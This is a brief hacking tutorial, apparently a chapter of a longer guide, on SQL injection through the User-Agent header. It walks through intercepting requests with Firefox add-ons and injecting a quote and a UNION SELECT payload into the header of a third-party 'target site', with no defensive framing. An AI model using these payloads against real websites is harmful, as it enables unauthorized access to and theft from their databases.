User agent based SQL Injection

This trick is such an underdog in the SQLi world, it’s unbelievable.

What we want to do is find a site that keeps hold of user agent’s and spits them out. A normal Firefox User Agent would look something similar to:

Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201

Now what we want to do is create an error, it’s slightly different because you’re working with User Agents, but never the less fairly easy to do.

Tools aviable for use:

1.       Live HTTP Headers (Firefox add-on)

2.       Tamper data (Another Firefox add-on)

I will keep these 2 as the main prospects as they are the easiest way to use.

In my example I will use Tamper Data to work with our user agent, as it’s the easiest one to use.

n  Steps:

1.       Open up tamper data.

2.       Reload your target site.

3.       Tamper the request.

4.       Edit the user agent.

Now we edit our user agent just like we would add the ‘ sign in a normal SQL situation.

We edit our user agent to: ‘
Now most likely you will get an error (check back to chapter 1 for which errors).

Now to check the amount of columns we do the following:
User-agent: ‘ union select 1-- -- (Note the double – signs, make sure you have those!)

Now we keep going on, until we see results (numbers should show at some point)

With my example it will show at column 2.
Now all you have to do is follow Chapter 1 again, slightly different, but you get the point.